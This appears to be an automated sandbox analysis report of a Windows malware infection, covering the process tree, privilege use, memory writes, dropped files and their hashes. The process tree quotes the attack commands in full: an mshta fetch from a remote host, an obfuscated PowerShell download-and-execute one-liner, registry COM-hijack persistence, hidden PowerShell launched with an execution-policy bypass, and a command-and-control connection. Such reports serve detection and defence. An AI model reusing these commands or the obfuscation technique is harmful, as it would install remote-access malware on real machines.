pOwErshEll.exepowershell.exepOwErshEll.exepowershell.exedescription pid process Token: SeDebugPrivilege 4804 pOwErshEll.exe Token: SeDebugPrivilege 4980 powershell.exe Token: SeDebugPrivilege 3512 pOwErshEll.exe Token: SeDebugPrivilege 4404 powershell.exe Token: SeIncreaseQuotaPrivilege 4980 powershell.exe Token: SeSecurityPrivilege 4980 powershell.exe Token: SeTakeOwnershipPrivilege 4980 powershell.exe Token: SeLoadDriverPrivilege 4980 powershell.exe Token: SeSystemProfilePrivilege 4980 powershell.exe Token: SeSystemtimePrivilege 4980 powershell.exe Token: SeProfSingleProcessPrivilege 4980 powershell.exe Token: SeIncBasePriorityPrivilege 4980 powershell.exe Token: SeCreatePagefilePrivilege 4980 powershell.exe Token: SeBackupPrivilege 4980 powershell.exe Token: SeRestorePrivilege 4980 powershell.exe Token: SeShutdownPrivilege 4980 powershell.exe Token: SeDebugPrivilege 4980 powershell.exe Token: SeSystemEnvironmentPrivilege 4980 powershell.exe Token: SeRemoteShutdownPrivilege 4980 powershell.exe Token: SeUndockPrivilege 4980 powershell.exe Token: SeManageVolumePrivilege 4980 powershell.exe Token: 33 4980 powershell.exe Token: 34 4980 powershell.exe Token: 35 4980 powershell.exe Token: 36 4980 powershell.exe Token: SeIncreaseQuotaPrivilege 4980 powershell.exe Token: SeSecurityPrivilege 4980 powershell.exe Token: SeTakeOwnershipPrivilege 4980 powershell.exe Token: SeLoadDriverPrivilege 4980 powershell.exe Token: SeSystemProfilePrivilege 4980 powershell.exe Token: SeSystemtimePrivilege 4980 powershell.exe Token: SeProfSingleProcessPrivilege 4980 powershell.exe Token: SeIncBasePriorityPrivilege 4980 powershell.exe Token: SeCreatePagefilePrivilege 4980 powershell.exe Token: SeBackupPrivilege 4980 powershell.exe Token: SeRestorePrivilege 4980 powershell.exe Token: SeShutdownPrivilege 4980 powershell.exe Token: SeDebugPrivilege 4980 powershell.exe Token: SeSystemEnvironmentPrivilege 4980 powershell.exe Token: SeRemoteShutdownPrivilege 4980 powershell.exe Token: SeUndockPrivilege 4980 powershell.exe Token: SeManageVolumePrivilege 4980 powershell.exe Token: 33 4980 powershell.exe Token: 34 4980 powershell.exe Token: 35 4980 powershell.exe Token: 36 4980 powershell.exe Token: SeIncreaseQuotaPrivilege 4980 powershell.exe Token: SeSecurityPrivilege 4980 powershell.exe Token: SeTakeOwnershipPrivilege 4980 powershell.exe Token: SeLoadDriverPrivilege 4980 powershell.exe Token: SeSystemProfilePrivilege 4980 powershell.exe Token: SeSystemtimePrivilege 4980 powershell.exe Token: SeProfSingleProcessPrivilege 4980 powershell.exe Token: SeIncBasePriorityPrivilege 4980 powershell.exe Token: SeCreatePagefilePrivilege 4980 powershell.exe Token: SeBackupPrivilege 4980 powershell.exe Token: SeRestorePrivilege 4980 powershell.exe Token: SeShutdownPrivilege 4980 powershell.exe Token: SeDebugPrivilege 4980 powershell.exe Token: SeSystemEnvironmentPrivilege 4980 powershell.exe Token: SeRemoteShutdownPrivilege 4980 powershell.exe Token: SeUndockPrivilege 4980 powershell.exe Token: SeManageVolumePrivilege 4980 powershell.exe Token: 33 4980 powershell.exe -
Suspicious use of FindShellTrayWindow 33 IoCs
Processes:
explorer.exepid process 4696 explorer.exe 4696 explorer.exe 4696 explorer.exe 4696 explorer.exe 4696 explorer.exe 4696 explorer.exe 4696 explorer.exe 4696 explorer.exe 4696 explorer.exe 4696 explorer.exe 4696 explorer.exe 4696 explorer.exe 4696 explorer.exe 4696 explorer.exe 4696 explorer.exe 4696 explorer.exe 4696 explorer.exe 4696 explorer.exe 4696 explorer.exe 4696 explorer.exe 4696 explorer.exe 4696 explorer.exe 4696 explorer.exe 4696 explorer.exe 4696 explorer.exe 4696 explorer.exe 4696 explorer.exe 4696 explorer.exe 4696 explorer.exe 4696 explorer.exe 4696 explorer.exe 4696 explorer.exe 4696 explorer.exe -
Suspicious use of SendNotifyMessage 20 IoCs
Processes:
explorer.exepid process 4696 explorer.exe 4696 explorer.exe 4696 explorer.exe 4696 explorer.exe 4696 explorer.exe 4696 explorer.exe 4696 explorer.exe 4696 explorer.exe 4696 explorer.exe 4696 explorer.exe 4696 explorer.exe 4696 explorer.exe 4696 explorer.exe 4696 explorer.exe 4696 explorer.exe 4696 explorer.exe 4696 explorer.exe 4696 explorer.exe 4696 explorer.exe 4696 explorer.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
SearchUI.exeexplorer.exepid process 4224 SearchUI.exe 4696 explorer.exe 4696 explorer.exe -
Suspicious use of WriteProcessMemory 62 IoCs
Processes:
pOwErshEll.exepowershell.exepOwErshEll.execmd.execmd.exepowershell.exeaspnet_compiler.exeexplorer.exepOwErshEll.execmd.execmd.exepowershell.exedescription pid process target process PID 4804 wrote to memory of 4980 4804 pOwErshEll.exe powershell.exe PID 4804 wrote to memory of 4980 4804 pOwErshEll.exe powershell.exe PID 4980 wrote to memory of 1812 4980 powershell.exe WScript.exe PID 4980 wrote to memory of 1812 4980 powershell.exe WScript.exe PID 3512 wrote to memory of 4828 3512 pOwErshEll.exe cmd.exe PID 3512 wrote to memory of 4828 3512 pOwErshEll.exe cmd.exe PID 4828 wrote to memory of 2596 4828 cmd.exe reg.exe PID 4828 wrote to memory of 2596 4828 cmd.exe reg.exe PID 4828 wrote to memory of 3976 4828 cmd.exe reg.exe PID 4828 wrote to memory of 3976 4828 cmd.exe reg.exe PID 4828 wrote to memory of 3068 4828 cmd.exe cmd.exe PID 4828 wrote to memory of 3068 4828 cmd.exe cmd.exe PID 3068 wrote to memory of 4404 3068 cmd.exe powershell.exe PID 3068 wrote to memory of 4404 3068 cmd.exe powershell.exe PID 4404 wrote to memory of 236 4404 powershell.exe aspnet_compiler.exe PID 4404 wrote to memory of 236 4404 powershell.exe aspnet_compiler.exe PID 4404 wrote to memory of 236 4404 powershell.exe aspnet_compiler.exe PID 4404 wrote to memory of 236 4404 powershell.exe aspnet_compiler.exe PID 4404 wrote to memory of 236 4404 powershell.exe aspnet_compiler.exe PID 4404 wrote to memory of 236 4404 powershell.exe aspnet_compiler.exe PID 4404 wrote to memory of 236 4404 powershell.exe aspnet_compiler.exe PID 4404 wrote to memory of 236 4404 powershell.exe aspnet_compiler.exe PID 236 wrote to memory of 4696 236 aspnet_compiler.exe explorer.exe PID 236 wrote to memory of 4696 236 aspnet_compiler.exe explorer.exe PID 4696 wrote to memory of 4508 4696 explorer.exe ctfmon.exe PID 4696 wrote to memory of 4508 4696 explorer.exe ctfmon.exe PID 236 wrote to memory of 1556 236 aspnet_compiler.exe cvtres.exe PID 236 wrote to memory of 1556 236 aspnet_compiler.exe cvtres.exe PID 236 wrote to memory of 1556 236 aspnet_compiler.exe cvtres.exe PID 236 wrote to memory of 1556 236 aspnet_compiler.exe cvtres.exe PID 236 wrote to memory of 1556 236 aspnet_compiler.exe cvtres.exe PID 236 wrote to memory of 1556 236 aspnet_compiler.exe cvtres.exe PID 236 wrote to memory of 1556 236 aspnet_compiler.exe cvtres.exe PID 236 wrote to memory of 1556 236 aspnet_compiler.exe cvtres.exe PID 236 wrote to memory of 1448 236 aspnet_compiler.exe explorer.exe PID 236 wrote to memory of 1448 236 aspnet_compiler.exe explorer.exe PID 236 wrote to memory of 2564 236 aspnet_compiler.exe cvtres.exe PID 236 wrote to memory of 2564 236 aspnet_compiler.exe cvtres.exe PID 236 wrote to memory of 2564 236 aspnet_compiler.exe cvtres.exe PID 236 wrote to memory of 2564 236 aspnet_compiler.exe cvtres.exe PID 236 wrote to memory of 2564 236 aspnet_compiler.exe cvtres.exe PID 236 wrote to memory of 2564 236 aspnet_compiler.exe cvtres.exe PID 236 wrote to memory of 2564 236 aspnet_compiler.exe cvtres.exe PID 236 wrote to memory of 2564 236 aspnet_compiler.exe cvtres.exe PID 4328 wrote to memory of 4388 4328 pOwErshEll.exe cmd.exe PID 4328 wrote to memory of 4388 4328 pOwErshEll.exe cmd.exe PID 4388 wrote to memory of 4940 4388 cmd.exe reg.exe PID 4388 wrote to memory of 4940 4388 cmd.exe reg.exe PID 4388 wrote to memory of 3068 4388 cmd.exe reg.exe PID 4388 wrote to memory of 3068 4388 cmd.exe reg.exe PID 4388 wrote to memory of 4480 4388 cmd.exe cmd.exe PID 4388 wrote to memory of 4480 4388 cmd.exe cmd.exe PID 4480 wrote to memory of 3792 4480 cmd.exe powershell.exe PID 4480 wrote to memory of 3792 4480 cmd.exe powershell.exe PID 3792 wrote to memory of 4280 3792 powershell.exe aspnet_compiler.exe PID 3792 wrote to memory of 4280 3792 powershell.exe aspnet_compiler.exe PID 3792 wrote to memory of 4280 3792 powershell.exe aspnet_compiler.exe PID 3792 wrote to memory of 4280 3792 powershell.exe aspnet_compiler.exe PID 3792 wrote to memory of 4280 3792 powershell.exe aspnet_compiler.exe PID 3792 wrote to memory of 4280 3792 powershell.exe aspnet_compiler.exe PID 3792 wrote to memory of 4280 3792 powershell.exe aspnet_compiler.exe PID 3792 wrote to memory of 4280 3792 powershell.exe aspnet_compiler.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\usps54732563.vbs"1⤵
-
C:\Windows\system32\MShTa.exeMShTa https://clever-ishizaka.45-86-146-20.plesk.page/enc.txt1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
-
C:\Windows\System32\WindowsPowerShell\v1.0\pOwErshEll.exepOwErshEll $HWRKDYPCHLPUKFTAYIHIWUY = '[2+795<^}+8#}}8/86]=%4@y2+795<^}+8#}}8/86]=%4@t[8^^89_^1/!/2!4%%@0]!0\@^5+[)3=53%<9\$%\!5%}.IO.2+795<^}+8#}}8/86]=%4@t\$532(_-&(2+}/{)-8668%[8^^89_^1/!/2!4%%@0]!0%[6)5=$@571*!2!572[8#=\@^5+[)3=53%<9\$%\!5%}\$532(_-&(2+}/{)-8668%[8^^89_^1/!/2!4%%@0]!0%[6)5=$@571*!2!572[8#=d[8^^89_^1/!/2!4%%@0]!0\$532(_-&(2+}/{)-8668%]'.Replace('2+795<^}+8#}}8/86]=%4@','S').Replace('[8^^89_^1/!/2!4%%@0]!0','E').Replace('\$532(_-&(2+}/{)-8668%','R').Replace('%[6)5=$@571*!2!572[8#=','A').Replace('\@^5+[)3=53%<9\$%\!5%}','M');$HGISFOJLGHGTWKXFKWLERCP = ($HWRKDYPCHLPUKFTAYIHIWUY -Join '')|&('I'+'EX');$HESVVOTYARWSCGTNFQORXXS = '[_9)=9(14!<2=/}412*-3^[y_9)=9(14!<2=/}412*-3^[#8!30%[-#@0}--_7!7^@3{^]328{(/\894+8^/*23(}3m.N^]328{(/\894+8^/*23(}3#8!30%[-#@0}--_7!7^@3{.W^]328{(/\894+8^/*23(}3bR^]328{(/\894+8^/*23(}3qu^]328{(/\894+8^/*23(}3_9)=9(14!<2=/}412*-3^[#8!30%[-#@0}--_7!7^@3{]'.Replace('_9)=9(14!<2=/}412*-3^[','S').Replace('^]328{(/\894+8^/*23(}3','E').Replace('#8!30%[-#@0}--_7!7^@3{','T');$HIGABGCKCBROYYQALTYPZKR = ($HESVVOTYARWSCGTNFQORXXS -Join '')|&('I'+'EX');$HOGUKKKLZNQHLPITPFOIIEG = '{#}-*=102}(})4{9449-_5r=0+]3!<!+2=61*%@^=$&$<a6[23_^7*6^5)+^2+__!+5*=0+]3!<!+2=61*%@^=$&$<'.Replace('{#}-*=102}(})4{9449-_5','C').Replace('=0+]3!<!+2=61*%@^=$&$<','E').Replace('6[23_^7*6^5)+^2+__!+5*','T');$HJPBNVFRVKQYTURDRPQKTRO = '3$48{=)*!4+-4[}<+^54[71@[/!}2-7-[){(<$+%/)61tR1@[/!}2-7-[){(<$+%/)61\\#7[_<}*1+[#=@[#}^*\/pon\\#7[_<}*1+[#=@[#}^*\/1@[/!}2-7-[){(<$+%/)61'.Replace('3$48{=)*!4+-4[}<+^54[7','G').Replace('1@[/!}2-7-[){(<$+%/)61','E').Replace('\\#7[_<}*1+[#=@[#}^*\/','S');$HDXFLYZFQJTQAWVJJGZFEHJ = 'G\\692[355)4<1]5(_+2][%t}$8$99[3-&=3*52=7/(13#\\692[355)4<1]5(_+2][%\^3819{_672<%/*4<#{@7}pon\^3819{_672<%/*4<#{@7}\\692[355)4<1]5(_+2][%\^3819{_672<%/*4<#{@7}t}$8$99[3-&=3*52=7/(13#\\692[355)4<1]5(_+2][%am'.Replace('\^3819{_672<%/*4<#{@7}','S').Replace('\\692[355)4<1]5(_+2][%','E').Replace('}$8$99[3-&=3*52=7/(13#','R');$HTYWQAKBUXVLTSROKPPULHW = ']^\_<@-4!!<%4-1)({02](8/!<&\%39}##&-^(9%!)6#a4420=(@}=2&09<!1}})825To8/!<&\%39}##&-^(9%!)6#n4420=(@}=2&09<!1}})825'.Replace(']^\_<@-4!!<%4-1)({02](','R').Replace('8/!<&\%39}##&-^(9%!)6#','E').Replace('4420=(@}=2&09<!1}})825','D');&('I'+'EX')($HGISFOJLGHGTWKXFKWLERCP::new($HIGABGCKCBROYYQALTYPZKR::$HOGUKKKLZNQHLPITPFOIIEG('https://clever-ishizaka.45-86-146-20.plesk.page/bil1.txt').$HJPBNVFRVKQYTURDRPQKTRO().$HDXFLYZFQJTQAWVJJGZFEHJ()).$HTYWQAKBUXVLTSROKPPULHW())1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\ProgramData\ZVRWWLCFPWDOBNVCDRSFZL\ZVRWWLCFPWDOBNVCDRSFZL.ps1'"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\ZVRWWLCFPWDOBNVCDRSFZL\ZVRWWLCFPWDOBNVCDRSFZL.vbs"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\pOwErshEll.exepOwErshEll -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\ZVRWWLCFPWDOBNVCDRSFZL\ZVRWWLCFPWDOBNVCDRSFZL.bat1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\ZVRWWLCFPWDOBNVCDRSFZL\ZVRWWLCFPWDOBNVCDRSFZL.bat""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f3⤵
- Modifies registry class
- Modifies registry key
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /f3⤵
- Registers COM server for autorun
- Modifies registry class
- Modifies registry key
-
C:\Windows\system32\cmd.execMd.E"x"e /c =PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\ZVRWWLCFPWDOBNVCDRSFZL\BOHRRCBYGXGIFDRSIXWFDC.ps1'"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\ZVRWWLCFPWDOBNVCDRSFZL\BOHRRCBYGXGIFDRSIXWFDC.ps1'"4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"5⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"6⤵
- Modifies Installed Components in the registry
- Enumerates connected drives
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\ctfmon.exectfmon.exe7⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" W02JZ3 vvat22.con-ip.com 8000 DU469J6⤵
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"6⤵
- Modifies registry class
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" W02JZ3 vvat22.con-ip.com 8000 DU469J6⤵
-
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\ProgramData\ZVRWWLCFPWDOBNVCDRSFZL\ZVRWWLCFPWDOBNVCDRSFZL.vbs"1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\pOwErshEll.exepOwErshEll -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\ZVRWWLCFPWDOBNVCDRSFZL\ZVRWWLCFPWDOBNVCDRSFZL.bat1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\ZVRWWLCFPWDOBNVCDRSFZL\ZVRWWLCFPWDOBNVCDRSFZL.bat""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f3⤵
- Modifies registry class
- Modifies registry key
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /f3⤵
- Registers COM server for autorun
- Modifies registry class
- Modifies registry key
-
C:\Windows\system32\cmd.execMd.E"x"e /c =PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\ZVRWWLCFPWDOBNVCDRSFZL\BOHRRCBYGXGIFDRSIXWFDC.ps1'"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\ZVRWWLCFPWDOBNVCDRSFZL\BOHRRCBYGXGIFDRSIXWFDC.ps1'"4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"5⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\ZVRWWLCFPWDOBNVCDRSFZL\BOHRRCBYGXGIFDRSIXWFDC.ps1Filesize
249KB
MD528ab88bf6ff1a4835ea247f09fb4e980
SHA1829d45e49f11f5da29442f1afd17c6dd0ae4b48c
SHA256898729d46e2db2f92196abe4d21d9920aa3cc7920decdd101d8c7b49ce5e3b5d
SHA51255f104effadd219b559da7d0069d6f1b26948a089abd2d2c05d732b68cb20fe7dad6c6f148ab7964561568d3f321941aef76791bbba2b1642053aeb3425a19e3
-
C:\ProgramData\ZVRWWLCFPWDOBNVCDRSFZL\ZVRWWLCFPWDOBNVCDRSFZL.batFilesize
706B
MD5bfebaf18276015bd77ed944f08929d62
SHA11fb674c003fdc371fc9239f4016b5be1b2e70935
SHA256a364e3ea1ea7dedb14b674d29e788fc08ef300d5b67c3db4f9150ca74afa0282
SHA512b8214237f7a2928dfe9c3b16426174cc851a8008f660d999639aeb076212a9759be612200323decdb152fc45714ca24714137508326682d91545f31b7a9ff489
-
C:\ProgramData\ZVRWWLCFPWDOBNVCDRSFZL\ZVRWWLCFPWDOBNVCDRSFZL.ps1Filesize
3KB
MD56a207906eb0945c3550570d371f1238b
SHA1d60341caef778c7f5e629591f74e60747534097d
SHA2563be0c65b346b1262385fdf1cd77a47112567f28a2799bd3ddf9978b9f5a7d4a2
SHA512821542ea89417ea68c7f804b669c681dbd66d01866634b6e1ec2f0c6f0d7786f815f1da955f6991ba619760cb93c6760993a9af0d5cdf504d2e269a00133e3db
-
C:\ProgramData\ZVRWWLCFPWDOBNVCDRSFZL\ZVRWWLCFPWDOBNVCDRSFZL.vbsFilesize
1KB
MD55cc053e6f85d07d8d739aa219a052a90
SHA14da9b52fca6eb93f671ea17c8b2fb779fdc7d7cc
SHA256ccafbce5c786d20c73d923a7480a2df515705f2cddc1223d770c10a214cd5084
SHA512eaba0f19d7e859b05f2fa6761bda6f385be968dd87928e9668a2a7228dd1182b4eb8d65ad40dc8634bcf37d5cd0e8a9a451629c498d64758b0598cdde92ec7e9
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\pOwErshEll.exe.logFilesize
3KB
MD598b836844b319b52cf34f2e7910c8519
SHA1724bf99f8ca3ded93da040d3764a264066cd11cc
SHA256c6d7aed431499274f95c61eb9dbe8cbb5dd86cdb8ba117205ae7f2e053a79f62
SHA51251fe509ebb7456176ec5ecda6e6f595d566644ddf9dc4baac81384398e1d871fba4a90d4d0cea31ab016267b89aa5af863e5df325a1a645a224849ca788475f3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD52fec15de447a0b7f220915bf02fb20cd
SHA1c9eca4b27f7bf6d580c11aa681de509108ef4f12
SHA25615d7be6d74b72e5d8a6d2d91199fa433778120e290afce6eb0bd4d2e8ea2b5f0
SHA512286668bd8a12594833ba25d41d6c4c76fec1ce12bb2d37d92d481447daaa80deff37dd1de8bae4a89ed81c2c481a580f0f26511ceadfd4f796bac297549955dc
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5e2ebfdbce67e9de0662c02c905b9f8b4
SHA17117e75f2fd98c32184ba11002ef4d1baa481b0c
SHA256b8fa7f4c17165391d3cebc0e1877d7a90447b9e5c9ad97c68057a5ba30fc215f
SHA512c9c365575f33015fe14bad7b75c4158bf3f9b592dbc07fd9547177d0a4685ed89ac98fea1772003b3605238f0882b0c19a2de20b7386b821ad272fee7ba4c6e5
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5c8e85267715d335620de1c319faf6b76
SHA1efa7be861bdeaa69b288d916c9cd5fee06461bd6
SHA256fc1bdf10b02e8ef200ebd5e744a2dd7e9c52f61f8469440756140e5ddd7a4cd5
SHA512aa7e46eb42dd3a0bc421d9b369f2321986340873fc16d37c137b1da1a67f02e6982572a388cefd8f8087df7ed39f2433e9a706f23e67d13c2cf67bcb5fc2af8d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5c8e85267715d335620de1c319faf6b76
SHA1efa7be861bdeaa69b288d916c9cd5fee06461bd6
SHA256fc1bdf10b02e8ef200ebd5e744a2dd7e9c52f61f8469440756140e5ddd7a4cd5
SHA512aa7e46eb42dd3a0bc421d9b369f2321986340873fc16d37c137b1da1a67f02e6982572a388cefd8f8087df7ed39f2433e9a706f23e67d13c2cf67bcb5fc2af8d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD59d4aa88888cb027c6ef8c0e459904c17
SHA16a57304fa6ca38d92c986bee4d96337739e5de78
SHA256a7502d33aa0a46daceb69811f5b56795b7f794fd52e82198b2800242fcb96337
SHA512e4462ab5b5f4aa8fac223a01c1b3f598355e64c181a47d3ab555033775e8e3a28a2641188e5298ec2dc593414d08bba7b4a19978ee52d0b4ddc3ab0451676300
-
C:\Users\Admin\AppData\Roaming\temp0923Filesize
10B
MD50d1d19fd6aeecc69bfe4520fd6c21a92
SHA1a759ac11b900cc3f5865dd35ae034d1b93da9f2c
SHA256890932dec6841bdbcb979c473b53f64400cf076d2c90e1e02e999528aa739d84
SHA5128a7d9620144778cf6625ad8e2a4c25752af4a548258b0bdcae3d1d5f88ad24e031719a0a368ecf56dd120e1f4ef8a6e1524b6bc29f6460e27c185084ab0a78f3
-
C:\Users\Admin\license.pemFilesize
12B
MD57e4264088ccba3429fe967da77bec684
SHA1e94f6372834799a0063824e6beba190e851c584e
SHA2566e2deaa9d939ed332df86fb50d9a386a4ee5d7a1e26da30421465491601bf3cc
SHA512ec1e3271bc5c2171f6a43596bfc53b92c37b7897a5e120040eb06fbffe3f9ac9f27ae305a7a9e806b495cbc755eb6002c70a3eac4943abcfbf2d354533587e2b
-
memory/236-290-0x0000000077520000-0x00000000776AE000-memory.dmpFilesize
1.6MB
-
memory/236-298-0x0000000077520000-0x00000000776AE000-memory.dmpFilesize
1.6MB
-
memory/236-248-0x000000000040C73E-mapping.dmp
-
memory/236-454-0x00000000058F0000-0x0000000005906000-memory.dmpFilesize
88KB
-
memory/236-249-0x0000000077520000-0x00000000776AE000-memory.dmpFilesize
1.6MB
-
memory/236-252-0x0000000077520000-0x00000000776AE000-memory.dmpFilesize
1.6MB
-
memory/236-253-0x0000000077520000-0x00000000776AE000-memory.dmpFilesize
1.6MB
-
memory/236-256-0x0000000077520000-0x00000000776AE000-memory.dmpFilesize
1.6MB
-
memory/236-296-0x0000000077520000-0x00000000776AE000-memory.dmpFilesize
1.6MB
-
memory/236-257-0x0000000077520000-0x00000000776AE000-memory.dmpFilesize
1.6MB
-
memory/236-258-0x0000000077520000-0x00000000776AE000-memory.dmpFilesize
1.6MB
-
memory/236-297-0x0000000077520000-0x00000000776AE000-memory.dmpFilesize
1.6MB
-
memory/236-260-0x0000000077520000-0x00000000776AE000-memory.dmpFilesize
1.6MB
-
memory/236-261-0x0000000077520000-0x00000000776AE000-memory.dmpFilesize
1.6MB
-
memory/236-262-0x0000000077520000-0x00000000776AE000-memory.dmpFilesize
1.6MB
-
memory/236-263-0x0000000077520000-0x00000000776AE000-memory.dmpFilesize
1.6MB
-
memory/236-264-0x0000000077520000-0x00000000776AE000-memory.dmpFilesize
1.6MB
-
memory/236-265-0x0000000077520000-0x00000000776AE000-memory.dmpFilesize
1.6MB
-
memory/236-266-0x0000000077520000-0x00000000776AE000-memory.dmpFilesize
1.6MB
-
memory/236-267-0x0000000077520000-0x00000000776AE000-memory.dmpFilesize
1.6MB
-
memory/236-268-0x0000000077520000-0x00000000776AE000-memory.dmpFilesize
1.6MB
-
memory/236-269-0x0000000077520000-0x00000000776AE000-memory.dmpFilesize
1.6MB
-
memory/236-270-0x0000000077520000-0x00000000776AE000-memory.dmpFilesize
1.6MB
-
memory/236-271-0x0000000077520000-0x00000000776AE000-memory.dmpFilesize
1.6MB
-
memory/236-272-0x0000000077520000-0x00000000776AE000-memory.dmpFilesize
1.6MB
-
memory/236-273-0x0000000077520000-0x00000000776AE000-memory.dmpFilesize
1.6MB
-
memory/236-274-0x0000000077520000-0x00000000776AE000-memory.dmpFilesize
1.6MB
-
memory/236-275-0x0000000077520000-0x00000000776AE000-memory.dmpFilesize
1.6MB
-
memory/236-276-0x0000000077520000-0x00000000776AE000-memory.dmpFilesize
1.6MB
-
memory/236-277-0x0000000077520000-0x00000000776AE000-memory.dmpFilesize
1.6MB
-
memory/236-278-0x0000000077520000-0x00000000776AE000-memory.dmpFilesize
1.6MB
-
memory/236-279-0x0000000077520000-0x00000000776AE000-memory.dmpFilesize
1.6MB
-
memory/236-280-0x0000000077520000-0x00000000776AE000-memory.dmpFilesize
1.6MB
-
memory/236-281-0x0000000077520000-0x00000000776AE000-memory.dmpFilesize
1.6MB
-
memory/236-282-0x0000000077520000-0x00000000776AE000-memory.dmpFilesize
1.6MB
-
memory/236-283-0x0000000077520000-0x00000000776AE000-memory.dmpFilesize
1.6MB
-
memory/236-284-0x00000000003D0000-0x00000000003E2000-memory.dmpFilesize
72KB
-
memory/236-285-0x0000000077520000-0x00000000776AE000-memory.dmpFilesize
1.6MB
-
memory/236-286-0x0000000077520000-0x00000000776AE000-memory.dmpFilesize
1.6MB
-
memory/236-287-0x0000000077520000-0x00000000776AE000-memory.dmpFilesize
1.6MB
-
memory/236-288-0x0000000077520000-0x00000000776AE000-memory.dmpFilesize
1.6MB
-
memory/236-289-0x0000000077520000-0x00000000776AE000-memory.dmpFilesize
1.6MB
-
memory/236-345-0x0000000006790000-0x0000000006822000-memory.dmpFilesize
584KB
-
memory/236-291-0x0000000077520000-0x00000000776AE000-memory.dmpFilesize
1.6MB
-
memory/236-292-0x0000000077520000-0x00000000776AE000-memory.dmpFilesize
1.6MB
-
